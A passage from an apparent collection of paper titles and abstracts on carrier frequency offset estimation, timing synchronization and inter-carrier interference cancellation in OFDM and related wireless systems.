complicate fundamental receiver functions, including the synchronization task. This work deals with pilot-aided carrier frequency offset (CFO) recovery in an OFDM direct-conversion receiver plagued by frequency-selective I/Q imbalance. Since the exact maximum likelihood (ML) solution of this problem requires a complete search over the frequency uncertainty range, we propose a simpler scheme that dispenses from any peak-search procedure. Numerical simulations and theoretical analysis indicate that the proposed scheme attains the relevant Cramer-Rao bound at all signal-to-noise ratios of practical interest. --- paper_title: Joint estimation of I/Q imbalance, CFO and channel response for MIMO OFDM systems paper_content: In this paper, we study the joint estimation of inphase and quadrature-phase (I/Q) imbalance, carrier frequency offset (CFO), and channel response for multiple-input multipleoutput (MIMO) orthogonal frequency division multiplexing (OFDM) systems using training sequences. A new concept called channel residual energy (CRE) is introduced. We show that by minimizing the CRE, we can jointly estimate the I/Q imbalance and CFO without knowing the channel response. The proposed method needs only one OFDM block for training and the training symbols can be arbitrary. Moreover when the training block consists of two repeated sequences, a low complexity two-step approach is proposed to solve the joint estimation problem. Simulation results show that the mean-squared error (MSE) of the proposed method is close to the Cramer-Rao bound (CRB). --- paper_title: Low-complexity joint regularised equalisation and carrier frequency offsets compensation scheme for single-carrier frequency division multiple access system paper_content: Since the conventional zero-forcing receiver does not operate satisfactorily in interference-limited environments, because of its noise amplification; the statistics of the transmitted data and the additive noise are required for the minimum-mean-square error receiver; the potential of the regularised receiver is proposed and investigated in this study to cope with these problems. In this study, the authors introduce an efficient low-complexity joint regularised equalisation and carrier frequency offset compensation (LJREC) scheme for single-carrier frequency division multiple access system. The proposed LJREC scheme avoids the noise amplification problem and the estimation of the signal-to-noise ratio and the interference matrices of other users. From the obtained simulation results, the proposed scheme enhances the system performance with lower complexity and sufficient robustness to the estimation errors. --- paper_title: Carrier Frequency Offset Estimation in OFDMA using Digital Filtering paper_content: This letter deals with the frequency synchronization problem in the uplink of OFDMA communications systems with interleaved or generalized subcarrier allocation. An algorithm to estimate the carrier frequency offsets (CFOs) of all the active users is presented. The estimator relies upon finding the zeros of a suitable designed filter. The design of the filter boils down to the solution of a least squares (LS) problem and thus entails relatively low complexity. While under low subcarrier load conditions the estimation root mean squared error (RMSE) is higher than that of other existing methods, under heavy or full load achieves comparable and even superior performance. --- paper_title: Carrier Frequency Offset Estimation for Uplink OFDMA Using Partial FFT Demodulation paper_content: Fast and accurate Carrier Frequency Offset (CFO) estimation is a problem of significance in many multi-carrier modulation based systems, especially in uplink Orthogonal Frequency Division Multiple Access (OFDMA) where the presence of multiple users exacerbates the inter-carrier interference (ICI) and results in multi-user interference (MUI). In this paper, a new technique called partial FFT demodulation is proposed. Estimators for the CFO are derived by considering an approximated matched filter for each user, implemented efficiently using several FFTs operating on sub-intervals of an OFDM block. Through simulations, the feasibility and performance of the proposed estimators are demonstrated. Associated trade-offs are discussed. --- paper_title: Blind CFO Estimation for Linearly Precoded OFDMA Uplink paper_content: This paper presents a novel method for blind carrier-frequency-offset (CFO) estimation in linearly precoded OFDMA uplink. Our investigation starts from the single-user equivalent (SUE) scenario presented in where active users in the network are categorized into a number of reference (synchronized) users (RUs) and a new (asynchronous) user (NU). The major idea is to take advantage of time correlation induced by the linear precoder, which offers a second-order moments-based blind CFO estimation. The precoder design is carefully performed in terms of CFO identifiability, estimation accuracy and overall system performance. In the multiuser scenario, where all users can be misaligned in frequency domain, the proposed CFO estimator is capable of mitigating a considerable portion of interference from neighboring users through exploitation of a novel time-frequency multiuser data-mapping (MU-DM) scheme. To demonstrate the multiuser interference (MUI)-resilience feature of proposed scheme, theoretical analysis is performed through derivation of approximate minimum-mean-square error (MMSE) in both SUE and multiuser scenarios. It is shown that by exploitation of the proposed MU-DM scheme, the approximate multiuser MMSE is very close to that of SUE scenario. Simulation results show that the proposed approach outperforms state-of-the-art approaches in both SUE and multiuser scenarios. --- paper_title: Generalised grouped minimum mean-squared errorbased multi-stage interference cancellation scheme for orthogonal frequency division multiple access uplink systems with carrier frequency offsets paper_content: In uplink orthogonal frequency division multiple access (OFDMA) systems with carrier frequency offsets (CFOs), there always be a dilemma that high performance and low complexity cannot be obtained simultaneously. In this study, in order to achieve better trade-off between performance and complexity, the authors propose a grouped minimum mean squared error (G-MMSE)-based multi-stage interference cancellation (MIC) scheme. The first stage of the proposed scheme is a G-MMSE detector, where the signal is detected group by group using banks of partial MMSE filters. The signal group can be either user based or subcarrier based. Multiple novel interference cancellation (IC) units are serially concatenated with the G-MMSE detector. Reusing the filters in the G-MMSE detector significantly reduces the computational complexity in the subsequent IC units as shown by the complexity analysis. The performance of the proposed G-MMSE-MIC schemes are evaluated by theoretical analysis and simulation. The results show that the proposed schemes outperform other existing schemes with considerably low complexity. --- paper_title: Joint CFO and Channel Estimation for OFDM-Based Two-Way Relay Networks paper_content: Joint estimation of the carrier frequency offset (CFO) and the channel is developed for a two-way relay network (TWRN) that comprises two source terminals and an amplify-and-forward (AF) relay. The terminals use orthogonal frequency division multiplexing (OFDM). New zero-padding (ZP) and cyclic-prefix (CP) transmission protocols, which maintain the carrier orthogonality and ensure low estimation and detection complexity, are proposed. Both protocols lead to the same estimation problem which can be solved by the nulling-based least square (LS) algorithm and perform identically when the block length is large. We present detailed performance analysis by proving the unbiasedness of the LS estimators at high signal-to-noise ratio (SNR) and by deriving the closed-form expression of the mean-square-error (MSE). Simulation results are provided to corroborate our findings. --- paper_title: A parallel ICI cancellation technique for OFDM systems paper_content: Carrier frequency offset, time variations due to Doppler shift or phase noise lead to a loss in the orthogonality between subcarriers of Orthogonal frequency division multiplexing (OFDM) systems and results in inter-carrier interference (ICI). Further developing the parallel cancellation (PC) scheme to mitigate the ICI of OFDM systems, we investigate the characteristics of this two-branch OFDM symbol-based PC scheme in details. Moreover, with known channel state information, we show that this PC scheme is the same as the optimal maximal ratio combining (MRC) technique for transmitter diversity, but with ICI mitigation capability. Additionally, we integrate this PC scheme into a space-time (ST) coded system to form a simple space-time parallel cancellation (STPC) scheme. This STPC scheme not only inherits advantages of the conventional PC scheme, such as backward compatibility with the existing OFDM systems, low receiver complexity, and two-branch diversity, but also provides better bit error rate (BER) performance with lower error floor, especially in slow and fast frequency selective fading channels at a high signal-noise-ratio (SNR) without increasing computational load. --- paper_title: A Novel Frequency Offset Tracking Algorithm for Space-Time Block Coded OFDM Systems paper_content: A novel frequency offset tracking algorithm for Space-Time Block Coded (STBC) Orthogonal Frequency Division Multiplexing (OFDM) systems is proposed in this work. Tracking of a frequency offset between the transmitter and the receiver is often aided by transmitting pilots embedded in the data payload. The proposed algorithm mainly exploits the specific construction of the OFDM symbol in STBC-OFDM systems, which does not need any additional pilots or sequences in the data field, providing high efficiency in spectrum. The estimator is derived on the basis of the maximum likelihood theory. Simulation results show that in a 2×2 multiple input multiple output (MIMO) system, under the assumption that the antennas are uncorrelated to each other, this method can provide a significant performance improvement in terms of the estimation accuracy of the frequency offset. --- paper_title: Robust Synchronization for 3GPP LTE System paper_content: This paper addresses problems related to time and frequency synchronization as well as blind CP (cyclic prefix) type identification in 3GPP LTE system. We start with a general framework based on maximum likelihood (ML) parameter estimation. Then, simplified practical algorithms for estimating time and frequency offset as well as blind CP length are described. Finally, a robust hierarchical scheme is proposed. Specifically, the CP based lagged auto-correlation is first employed to identify the CP type, estimate the carrier frequency offset (CFO), and grossly determine the symbol timing, and then the pilot (i.e. the LTE primary synchronization signal) based cross-correlation is used to more accurately determine the symbol and frame timing. A solution is given to the problem with unequal-length symbols, such as the symbols with the normal CP specified in the LTE. The proposed hierarchical scheme has both low complexity and high accuracy and can be realized without hardware support. --- paper_title: Iterative Joint Detection, ICI Cancelation and Estimation of Multiple CFOs and Channels for DVB-T2 in MISO Transmission Mode paper_content: When DVB-T2 uses the option of (distributed) multiple-input single-output transmission mode, a pair of Alamouti-encoded orthogonal frequency division multiplex signals is transmitted simultaneously from two spatially separated transmitters in a single frequency network. Since both transmitters have their own local oscillators, two distinct carrier frequency offsets (CFOs), one for each transmitter-receiver link, occur in the received signal due to the frequency mismatch between the local oscillators. Unfortunately, the multiple CFOs cannot be compensated simultaneously by merely adjusting the carrier frequency at the receiver side, so intercarrier interference (ICI) always exists. In this paper, we present an iterative receiver design to combat multiple CFOs for DVB-T2 application. To estimate both multiple CFOs and channels jointly without sacrificing the spectral efficiency, the joint maximum likelihood (ML) estimation based on the soft information from the channel decoder is used. The proposed receiver performs the iterative joint processing of the data detection, ICI cancelation, and joint ML estimation of the multiple CFOs and channels by exchanging the soft information. We also show that the complexity of the joint ML estimation can be reduced significantly by transforming a huge matrix pseudo-inversion into two sub-matrix pseudo-inversions. The performances are evaluated via a full DVB-T2 simulator. The numerical results show that the mean-squared error performance of the joint ML estimation is closely matched with the Cramer-Rao bound. Furthermore, the resulting bit error rate performance is enhanced in a progressive manner and is able to approach the ideal CFOs-free performance within a few iterations. --- paper_title: Transceiver Design for Distributed STBC Based AF Cooperative Networks in the Presence of Timing and Frequency Offsets paper_content: In multi-relay cooperative systems, the signal at the destination is affected by impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). In this paper we account for all these impairments and propose a new transceiver structure at the relays and a novel receiver design at the destination in distributed space-time block code (DSTBC) based amplify-and-forward (AF) cooperative networks. The Cramer-Rao lower bounds and a least squares (LS) estimator for the multi-parameter estimation problem are derived. In order to significantly reduce the receiver complexity at the destination, a differential evolution (DE) based estimation algorithm is applied and the initialization and constraints for the convergence of the proposed DE algorithm are investigated. In order to detect the signal from multiple relays in the presence of unknown channels, MTOs, and MCFOs, novel optimal and sub-optimal minimum mean-square error receiver designs at the destination node are proposed. Simulation results show that the proposed estimation and compensation methods achieve full diversity gain in the presence of channel and synchronization impairments in multi-relay AF cooperative networks. --- paper_title: A Synchronization Design for UWB-Based Wireless Multimedia Systems paper_content: Multi-band orthogonal frequency-division multiplexing (MB-OFDM) ultra-wideband (UWB) technology offers large throughput, low latency and has been adopted in wireless audio/video (AV) network products. The complexity and power consumption, however, are still major hurdles for the technology to be widely adopted. In this paper, we propose a unified synchronizer design targeted for MB-OFDM transceiver that achieves high performance with low implementation complexity. The key component of the proposed synchronizer is a parallel auto-correlator structure in which multiple ACF units are instantiated and their outputs are shared by functional blocks in the synchronizer, including preamble signal detection, time-frequency code identification, symbol timing, carrier frequency offset estimation and frame synchronization. This common structure not only reduces the hardware cost but also minimizes the number of operations in the functional blocks in the synchronizer as the results of a large portion of computation can be shared among different functional blocks. To mitigate the effect of narrowband interference (NBI) on UWB systems, we also propose a low-complexity ACF-based frequency detector to facilitate the design of (adaptive) notch filter in analog/digital domain. The theoretical analysis and simulation show that the performance of the proposed design is close to optimal, while the complexity is significantly reduced compared to existing work. --- paper_title: Training Signal Design and Tradeoffs for Spectrally-Efficient Multi-User MIMO-OFDM Systems paper_content: In this paper, we design MMSE-optimal training sequences for multi-user MIMO-OFDM systems with an arbitrary number of transmit antennas and an arbitrary number of training symbols. It addresses spectrally-efficient uplink transmission scenarios where the users overlap in time and frequency and are separated using spatial processing at the base station. The robustness of the proposed training sequences to residual carrier frequency offset and phase noise is evaluated. This analysis reveals an interesting design tradeoff between the peak-to-average power ratio of a training sequence and the increase in channel estimation mean squared error over the ideal case when these two impairments are not present. --- paper_title: Beamforming Based Receiver Scheme for DVB-T2 System in High Speed Train Environment paper_content: In this paper, the received signal from the different base stations (BSs) of the second generation of Terrestrial Digital Video Broadcasting (DVB-T2) in the high-speed-train (HST) scenario is modeled as a fast time-varying signal with the multiple Doppler frequency offsets. The interference caused by the multiple Doppler frequency offsets and the channel variations, and the signal to interference plus noise ratio of the received signal, are derived for the DVB-T2 receiver. The results of the theoretical analysis show that the interference greatly degraded the performance of the DVB-T2 system. To suppress the interference, we proposed a beamforming based receiver scheme for DVB-T2 system. By using the new signal processing scheme for the received signal vector from the antenna array, one can separate the received signal with the multiple Doppler frequency offsets into the multiple signals, each of which is with a single Doppler frequency offset. The separated signals are compensated by the corresponding Doppler frequency offsets and equalized by the estimated channel responses respectively, then combined into a signal to be demodulated. The results of the simulation show that the proposed scheme can effectively suppress the interference and greatly improve the performance of the DVB-T2 system in the HST environment. --- paper_title: Low-Complexity Sequential Searcher for Robust Symbol Synchronization in OFDM Systems paper_content: Based on the frequency-domain analog-to-digital conversion (FD ADC), this work builds a low-complexity sequential searcher for robust symbol synchronization in a 4 × 4 FD multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) modem. The proposed scheme adopts a symbol-rate sequential search with simple cross-correlation metric to recover symbol timing over the frequency domain. Simulation results show that the detection error is less than 2% at signal-to-noise ratio (SNR) ≤5 dB. Performance loss is not significant when carrier frequency offset (CFO) ≤100 ppm. Using an in-house 65-nm CMOS technology, the proposed solution occupies 84.881 k gates and consumes 5.2 mW at 1.0 V supply voltage. This work makes the FD ADC more attractive to be adopted in high throughput OFDM systems. --- paper_title: Software Defined Radio Implementation of SMSE Based Overlay Cognitive Radio in High Mobility Environment paper_content: A spectrally modulated spectrally encoded (SMSE) based overlay cognitive radio has been implemented and demonstrated in [1] via GNU software define radio (SDR). However, like most of the current cognitive radio implementations and demonstrations, this work does not consider the mobility between cognitive radio nodes. In a high mobility environment, the frequency offset introduced by Doppler shift leads to loss of the orthogonality among subcarriers. As a direct result, severe inter-carrier interference (ICI) and performance degradation is observed. In our previous work, we have proposed a new ICI cancellation method (namely Total ICI Cancellation) for OFDM [2] and MC-CDMA [3] mobile communication systems, which eliminates the ICI without lowering the transmission rate nor reducing the bandwidth efficiency. In this paper, we apply the total ICI cancellation algorithm onto the SMSE base overlay cognitive radio to demonstrate a high performance cognitive radio in high mobility environment. Specifically, we demonstrate an SMSE based overlay cognitive radio that is capable of detecting primary users in real time and adaptively adjusting its transmission parameters to avoid interference to (and from) primary users. When the primary user transmission changes, the cognitive radio dynamically adjusts its transmission accordingly. Additionally, this cognitive radio maintains seamless real time video transmission between the cognitive radio pair even when large frequency offset is introduced by mobility between CR transmitter and receiver. --- paper_title: Estimation of Time and Frequency Offsets in LTE Coordinated Multi-Point Transmission paper_content: We address the impact, estimation and compensation of time and frequency offsets in LTE CoMP. In LTE CoMP, transmissions may come from a different transmission point in every subframe of one millisecond. Due to propagation delay differences and time-frequency synchronization imperfections between the transmission points, the user equipment (UE) receiver is thus exposed to different time- frequency offsets in every subframe. In this paper we illustrate both analytically and numerically the impact of these time and frequency offsets on channel estimation performance and finally on LTE CoMP link-level demodulation performance. Furthermore, we study the applicability of existing LTE reference signals to the time-frequency offset estimation problem. In particular we compare two approaches in which the UE is either aware or unaware of the exact transmission point. Finally, we show with LTE link-level simulations that using the proposed approaches the impacts of time-frequency offsets can be almost perfectly compensated. --- paper_title: On the true Cramer-Rao lower bound for data-aided carrier-phase-independent frequency offset and symbol timing estimation paper_content: In this letter we present new and simple closed form expressions for the true Cramer-Rao lower bound (CRB) for data-aided (DA) joint and individual carrier frequency offset and symbol timing estimation from a linearly modulated waveform transmitted over an AWGN channel. The bounds are derived under a carrier-phase-independent (CPI) estimation strategy wherein the carrier phase is viewed as a nuisance parameter and assumed to have a worst-case noninformative uniform distribution over [-?, ?]. The computation of these CRBs requires only a single numerical integration. In addition, computationally simpler yet highly accurate asymptotic lower bounds are presented. As particularizations, new bounds for individual CPI frequency estimation with known symbol timing from M-PSK and continuous wave (CW) signals are also reported. --- paper_title: Iterative ICI Cancellation for OFDM Receiver with Residual Carrier Frequency Offset paper_content: For mobile OFDM receiver, both Doppler spread and residual Carrier Frequency Offset (CFO) can cause inter-carrier interference (ICI) therefore performance degradation. In this paper, both the effects of Doppler spread and residual CFO (RCFO) are jointly considered to improve the receiver performance. A low complexity channel estimation is proposed to allow ICI cancellation at the receiver. We demonstrate through simulation that the receiver can achieve desirable performance even in fast fading with the presence of high residual CFO. --- paper_title: Closed Form SER Expressions for QPSK OFDM Systems With Frequency Offset in Rayleigh Fading Channels paper_content: In this letter, the performance of QPSK OFDM systems with frequency offsets is investigated. Closed form expressions for the symbol error rate (SER) that are valid for any frequency offset in Rayleigh fading channels are derived. To achieve this, a modification to the result of the integral of the product of two Q-functions over the Rayleigh distribution is provided. The modification makes the result of this integral valid in any case whether the arguments of the Q-functions are positive or negative. Simulation results are provided to demonstrate the accuracy of the derived expressions. --- paper_title: Inter-subcarrier interference compensation in the frequency-hopped single-carrier frequency division multiple access communication system paper_content: Single-carrier frequency division multiple access (SC-FDMA) system having very good characteristic on peak-to-average power ratio is promising in communication area. But the performance of SC-FDMA system is very sensitive to inter-subcarrier interference (ICI), and existing phase noise suppression algorithm has reduced just phase noise only. Therefore the authors propose effective method, phase noise and frequency offset suppression (PNFS) algorithm, using comb-type pilot. PNFS algorithm can suppress phase noise, carrier frequency offset and even Doppler effect simultaneously in frequency domain. Through PNFS algorithm, SC-FDMA system has robust characteristic against ICI of performance degradation. Moreover, in these days, most electronic communication systems are weak to jamming. So, frequency-hopped (FH) scheme, which is one kind of spread spectrum techniques as a means of making performance better to supplement a disadvantage of SC-FDMA system on jamming attack, is considered. The authors would like to analyse ICI and jamming in SC-FDMA system and employ FH technique in SC-FDMA system because existing studies have not considered the situation regarding ICI and jamming exist simultaneously in mobile channel. So, the authors analyse degradation factors in FH-SC-FDMA system about ICI and jamming signal categorised as partial band jamming and multi-tone jamming. Then, the proposed FH-SC-FDMA system using PNFS algorithm has strong performances about ICI and jamming. --- paper_title: Frequency Offset and Channel Estimation in Co-Relay Cooperative OFDM Systems paper_content: Frequency offset and channel estimation in cooperative orthogonal frequency division multiplexing (OFDM) systems is studied in this paper. We consider the scenario of two or more source nodes sharing the same relay, i.e., corelay cooperative communications, and a new preamble, which is central-symmetric in time-domain, is proposed to perform the frequency offset and channel estimation. The non-zero samples in the proposed preamble are sparsely distributed with two neighboring non-zero samples being separated by μ > 1 zeros. As long as μ > 2L - 1 is satisfied, the multipath interference can be effectively eliminated, where L stands for the channel order. Unlike [1], the proposed preamble has a much lower Peak-to-Average Power Ratio (PAPR). The interference among the multiple source nodes can also be eliminated by using a backoff modulation scheme on the proposed preamble in each source node, and the mean-square error (MSE) of the proposed Least-Square (LS) channel estimator can be minimized by ensuring the orthogonality among the source nodes. The Pairwise Error Probability (PEP) performance of the proposed system by considering both the frequency offset and channel estimation errors is also derived in this paper. For a given Signalto-Noise-Ratio (SNR), by keeping the total power consumption to the source nodes and the relay to be constant, the PEP can be minimized by adjusting the ratio between the power allocated to the source nodes and the total power. --- paper_title: Blind Maximum-Likelihood Carrier-Frequency-Offset Estimation for Interleaved OFDMA Uplink Systems paper_content: Blind maximum-likelihood (ML) carrier-frequency-offset (CFO) estimation is considered to be difficult in interleaved orthogonal frequency-division multiple-access (OFDMA) uplink systems. This is because multiple CFOs have to be simultaneously estimated (each corresponding to a user's carrier), and an exhaustive multidimensional search is required. The computational complexity of the search may be prohibitively high. Methods such as the multiple signal classification and the estimation of signal parameters via the rotational invariance technique have been proposed as alternatives. However, these methods cannot maximize the likelihood function, and the performance is not optimal. In this paper, we propose a new method to solve the problem. With our formulation, the likelihood function can be maximized, and the optimum solution can be obtained by solving a polynomial function. Compared with the exhausted search, the computational complexity can be reduced dramatically. Simulations show that the performance of the proposed method can approach that of the Cramer-Rao lower bound. --- paper_title: A Composite PN-Correlation Based Synchronizer for TDS-OFDM Receiver paper_content: In this paper, we presents a novel synchronizer dealing with carrier frequency offset (CFO), sampling frequency offset (SFO), as well as frame timing offset (FTO) in TDS-OFDM receiver. The proposed schemes are based on tracking the output waveform of a composite PN-correlator (CPC), which provides sufficient correlative gains to detect its peaks even in the presence of large CFOs. From the correlation peaks, we can extract useful information for estimating the synchronization offsets. CFO is recovered by a multi-stage CPC scheme, of which the parameters are adjustable for meeting the system's demands on the tracking range and accuracy. According to the inter-frame variations of correlation waveform, we estimate SFO for a large scale and correct SFO through an interpolator. Meanwhile, frame timing is investigated in this paper, and the analysis indicates a very fast and robust timing scheme is possible for TDS-OFDM receiver. The developed synchronizer is quite robust against a large CFO even in very adverse fading channels, and it is shown by computer simulation that the residual synchronization error has little effect on the performance of TDS-OFDM receiver. --- paper_title: A Simplified MMSE Equalizer for Distributed TR-STBC Systems with Multiple CFOs paper_content: In distributed wireless systems, the traditional carrier frequency offset (CFO) compensation methods may not be applied due to the existence of multiple CFOs. In this paper, we address the equalization issue for distributed time-reversal space-time block coded (TR-STBC) systems when multiple CFOs are presented. A simplified minimum mean-square error (MMSE) equalizer is proposed, which exploits the nearly-banded structure of the channel matrices and utilizes the {LDL}^H factorization to reduce the computational complexity. Simulation results show that the proposed equalizer can achieve the similar performance as the traditional MMSE equalizer while possessing much less complexity. --- paper_title: A Bayesian Algorithm for Joint Symbol Timing Synchronization and Channel Estimation in Two-Way Relay Networks paper_content: This work investigates joint estimation of symbol timing synchronization and channel response in two-way relay networks (TWRN) that utilize amplify-and-forward (AF) relay strategy. With unknown relay channel gains and unknown timing offset, the optimum maximum likelihood (ML) algorithm for joint timing recovery and channel estimation can be overly complex. We develop a new Bayesian based Markov chain Monte Carlo (MCMC) algorithm in order to facilitate joint symbol timing recovery and effective channel estimation. In particular, we present a basic Metropolis-Hastings algorithm (BMH) and a Metropolis-Hastings-ML (MH-ML) algorithm for this purpose. We also derive the Cramer-Rao lower bound (CRLB) to establish a performance benchmark. Our test results of ML, BMH, and MH-ML estimation illustrate near-optimum performance in terms of mean-square errors (MSE) and estimation bias. We further present bit error rate (BER) performance results. --- paper_title: A Practical Double Peak Detection Coarse Timing for OFDM in Multipath Channels paper_content: For orthogonal frequency division multiplexing (OFDM) systems in multipath channels, the detection of the first path is desirable to avoid inter-symbol-interference (ISI). However, the conventional peak detection of the cyclic prefix (CP) correlation curve can detect the strongest path but not the first path, while the largest slope detection is sensitive to background noise. This paper presents a novel coarse timing algorithm using double peak detection of CP correlation, which is robust to noise and simple to implement in practice. Considering practical hardware impairments like sampling frequency offset (SFO), the performance of the proposed method is verified by simulations. --- paper_title: Low-cost integer frequency offset estimation for OFDM-based DRM receiver paper_content: In this paper, we propose an improved and low-cost integer frequency offset (IFO) estimation method by partitioning pilot symbols effectively in an orthogonal frequency division multiplexing based digital radio mondiale (DRM) system. To this end, the time reference cell (TRC) symbol for frequency estimation is grouped into a number of pilot clusters, so that the TRC subcarriers in each cluster are closely spaced to show approximately frequency-nonselective characteristics. The performance of the proposed IFO estimator is compared with that of the conventional estimator, and shows that the proposed technique can effectively achieve lower estimation errors in frequency offset estimation as well as can be implemented with reduced computational complexity. --- paper_title: Blind spectrum sensing in cognitive radio over fading channels and frequency offsets paper_content: This paper deals with the problem of spectrum sensing in cognitive radio. We consider a stochastic system model where the Primary User (PU) transmits a periodic signal over fading channels. The effect of frequency offsets due to oscillator mismatch, and Doppler offset is studied. We show that for this case the Likelihood Ratio Test (LRT) cannot be evaluated pointwise. We present a novel approach to approximate the marginilisation of the frequency offset using a single point estimate. This is obtained via a low complexity Constrained Adaptive Notch Filter (CANF) to estimate the frequency offset. Performance is evaluated via numerical simulations and it is shown that the proposed spectrum sensing scheme can achieve the same performance as the “near-optimal” scheme, that is based on a bank of matched filters, using only a fraction of the complexity required. --- paper_title: Timing and Frequency Offsets Compensation in Relay Transmission for 3GPP LTE Uplink paper_content: Relays can be used between the source and the destination to improve network coverage or reliability. In the relay based distributed space-time block-coded (DSTBC) single-carrier (SC) transmission scheme, asynchronism in time and frequency causes degradation in system performance because of the interblock interference, non-coherent combining and multiuser interference. The simultaneous presence of timing offset and carrier frequency offset also destroy the orthogonal structure of DSTBC. In this paper, we study the combined effect of timing offset and carrier frequency offset and propose a two stage equalization technique for this system at the destination terminal. Technique is based on interference cancellation and cyclic prefix reconstruction. The proposed equalization technique maintains the orthogonal structure of DSTBC and allows the use of low complexity one-tap frequency-domain equalizer. The technique significantly alleviates the effect of time offsets and frequency offsets at the destination without increasing the complexity of the receiver or disturbing the 3rd generation partnership project-long term evolution (3GPP LTE) uplink frame structure or the data rate over frequency selective channels. --- paper_title: Modified Symbol Timing Offset Estimation for OFDM over Frequency Selective Channels paper_content: This paper deals with the symbol timing issue of an OFDM system in frequency selective fading scenarios. A modified symbol timing offset estimator based on an energy transition metric is proposed. This metric can also be applied to estimate the maximum channel delay spread. Benefiting from the knowledge of the maximum channel delay spread, the modified estimator shows its advantage in a relatively low SNR regime. Compared to the original, the modified algorithm is able to acquire the symbol timing correctly in a relatively low SNR region. --- paper_title: Carrier Frequency Offset Tracking in the IEEE 802.16e OFDMA Uplink paper_content: The IEEE 802.16e standard for nomadic wireless metropolitan area networks adopts orthogonal frequency-division multiple-access (OFDMA) as an air interface. In these systems, residual carrier frequency offsets (CFOs) between the uplink signals and the base station local oscillator give rise to interchannel interference (ICI) as well as multiple access interference (MAI). Accurate CFO estimation and compensation is thus necessary to avoid a serious degradation of the error-rate performance. In this work, we address the problem of CFO tracking in the IEEE 802.16e uplink and present a closed-loop solution based on the least-squares (LS) principle. In doing so, we exploit a set of pilot tones that are available in each user's subchannel. The resulting scheme can be implemented with affordable complexity and is able to reliably track the CFOs of all active users. When used in conjunction with a frequency offset compensator, it can effectively mitigate ICI and MAI, thereby allowing channel equalization and data detection to follow directly. Numerical simulations are used to demonstrate the effectiveness of the proposed solution in the presence of residual time-varying frequency offsets. --- paper_title: Carrier frequency offset estimation for non-contiguous OFDM receiver in cognitive radio systems paper_content: For non-contiguous (NC) OFDM based cognitive radio (CR) systems, schemes have been developed in literature to acquire spectrum synchronization information (SSI) with perfect carrier frequency offset (CFO) synchronization. However, OFDM is extremely sensitive to the CFO in practice, which leads to inter-carrier interference (ICI), hence degrading the spectrum synchronization performance for existing schemes. An accurate CFO estimation is therefore required before setting up the SSI. In this paper, we present a novel scheme based on the maximum likelihood (ML) algorithm to estimate the CFO for the NC-OFDM receiver when the SSI is unknown. A corresponding Cramer-Rao lower bound (CRB) with the ideal SSI is derived to demonstrate the efficiency of the proposed scheme. Simulation results show that the proposed scheme is robust against interference and achieves a satisfactory accuracy of estimation, which is close to the relevant CRB. --- paper_title: On the effects of carrier frequency offset on cyclic prefix based OFDM and filter bank based multicarrier systems paper_content: Being sensitive to carrier frequency offset (CFO) is known to be one of the main drawbacks of multicarrier systems. In this paper, the effects of CFO on a filter bank based multicarrier system (FBMC) in a multipath fading channel are discussed, where an ideal root-raised cosine (RRC) filter with roll-off factor 1 is used as the prototype filter which enables analytical derivations of the interference caused by the CFO. Based on these results, an approximation on the SNR degradation with very small CFO is also given. Numerical experiments as well as Monte Carlo simulations are done to verify the analysis and the accuracy of the approximation in FBMC systems. A comparison with the SNR degradations in cyclic prefix based orthogonal frequency division multiplexing (CP-OFDM) systems has indicated an advantage of FBMC systems as being more robust to frequency misalignments. --- paper_title: An Optimized Iterative (Turbo) Receiver for OFDM Systems with Type-I Hybrid ARQ: Clipping and CFO Cases paper_content: An optimized iterative (Turbo) receiver for Orthogonal Frequency Division Multiplexing (OFDM) transmission is proposed for improved performance when used with type-I hybrid Automatic Repeat Request (ARQ) protocols. The proposed receiver is a Maximum Aposteriori Expectation-Maximization (MAP-EM) Turbo processor that exploits information from all available transmissions of a packet, including failed and new ones. Two distinct practical problems associated with OFDM are considered: (i) Clipping due to non-linearities in the transmit amplifier, and (ii) Carrier frequency offset (CFO). In the optimized scheme, failed transmissions are combined with the new ones to form an iterative receiver that jointly estimates the channel, compensates for the distortion (clipping, or CFO) and decodes the message. The modulation employed is M-ary Phase Shift Keying (MPSK). The system uses an embedded pilot structure for initial channel estimation of the channel, which is assumed doubly-selective. It is shown that gains on the order of 3 dB are achieved in the packet rejection probability with the proposed system. The performance of the optimized system is close to that of the ideal system, i.e. one that performs packet combining with perfect channel knowledge, no clipping, and no CFO. --- paper_title: Joint Carrier Synchronization and Equalization Algorithm for Packet-Based OFDM Systems Over the Multipath Fading Channel paper_content: In this paper, a joint carrier synchronization and equalization algorithm is presented for orthogonal frequency-division multiplexing (OFDM) systems in the tracking stage. Based on the minimum mean-square-error (MMSE) criterion, the cost function of the joint algorithm is proposed to minimize the mean square error (MSE), namely, the uncoded bit error rate (BER), on each subchannel and to further lower the carrier frequency jitter concurrently. The carrier synchronization scheme with multirate processing is a dual-loop structure, which is composed of outer and inner loops. The outer loop is a frequency-tracking loop that deals with the phase offset, which is induced by the carrier frequency offset (CFO), in the time domain. The inner loop is a phase-tracking loop to cope with the phase distortions, which are caused by the carrier frequency error and the channel phase variation, on each subcarrier in the frequency domain. There is a gain equalization loop to compensate the magnitude distortion on each subchannel. Furthermore, the closed-loop stability of the carrier synchronization loop is particularly explored for the loop delay induced by hardware realization. Many simulations are done for the additive white Gaussian noise (AWGN) and the multipath frequency-selective fading channels to show that the joint algorithm not only accurately estimates and compensates the CFO and the channel impairment but also provides the cost-effective feature compared with the considered algorithms. --- paper_title: Reduction of the Peak Interference to Carrier Ratio of OFDM Signals paper_content: In this paper, we provide a geometric interpretation of the Peak Interference to Carrier Ratio (PICR) of OFDM signals. Based on this interpretation, we propose a simple approach to reduce the sensitivity of OFMA system to carrier frequency offset (CFO). The main idea is to choose a well understood code and to rotate each coordinate of the code by a fixed phase shift such that the maximum inter-carrier interference (ICI) taken over all sub-carriers is minimized. This approach enjoys the twin benefits of interference reduction and error correction and is easy to implement in practice. Simulation results show that a reduction of 7 dB can freely be obtained. --- paper_title: I/Q imbalance and CFO in OFDM/OQAM systems: Interference analysis and compensation paper_content: Offset-QAM (OQAM) based OFDM has been considered as a promising technique for future wireless networks due to its higher resilience to narrow-band interference and doubly dispersive channels. In this paper, we investigate the effects of the RX imperfections, namely the I/Q imbalance (IQI) and the carrier frequency offset (CFO), on OFDM/OQAM downlink performance coupled with the imperfect knowledge of the frequency-selective channel. The influence of each impairment is characterized by the interference analysis of the demodulated signal that reveals interesting insight into the distortion origination. Then, we analytically investigate the performance loss as a function of IQI, CFO and channel distortions in a realistic receiver with channel estimation error. To cope with impaired reception, a joint maximum-likelihood estimation method with 